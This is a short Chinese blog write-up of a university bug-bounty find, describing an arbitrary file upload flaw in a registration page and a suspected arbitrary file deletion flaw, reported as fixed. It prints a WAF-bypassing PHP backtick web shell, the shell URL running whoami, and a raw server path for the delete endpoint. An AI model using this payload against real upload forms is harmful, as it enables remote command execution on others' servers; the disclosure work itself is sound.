EDUSRC-漏洞挖掘案例(一)

EDUSRC-漏洞挖掘案例(一)

声明

在发现此漏洞后,第一时间联系了该大学的信息中心老师,并且该系统当晚就完成了修复。

本文的初衷就是分享网络安全知识,若有读者因此做出任何危害网络安全的行为,请后果自负。

系统地址:http://xxx.xxx.edu.cn/index.php/index/login

报名申请页面:http://xxx.xxx.edu.cn/register

一、任意文件上传漏洞

报名申请页面有一处上传图片的功能

然后我们上传一个正常的图片,会提示需要输入身份证号才行

然后随便输一个身份证号就行

例如:110999199901011111

成功上传后会返回此文件在服务器上的路径

改后缀为.php也可以上传成功,不过网站的waf会对上传文件的内容做检查,当出现php$_GET$_POST等php相关函数时会直接报错,提示文件有威胁。

绕过waf

姿势挺多的,这里找了一种,直接用反引号执行命令。

1
<?=`$_GET[1]`;

上传成功。

shell地址:

1
http://xxx.xxx.edu.cn/public/uploads/registers/110999199901011111/100.php?1=whoami

未深入测试。

二、任意文件删除漏洞

这个洞没仔细测,因为会删除服务器上的文件,比较敏感,怀疑是有的。

漏洞出现在删除上传图片的功能处,上传一个文件,删除时抓包会抓到删除接口

经过Urldecode发现是真实路径。

1
/data/html/public/uploads/registers/110000100000000000/100.jpg

文章作者: Linuz
文章链接: https://linuz.me/2020/09/25/Edusrc-Vulnerability-1/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Linuz's Blog
敢不敢赏脸一次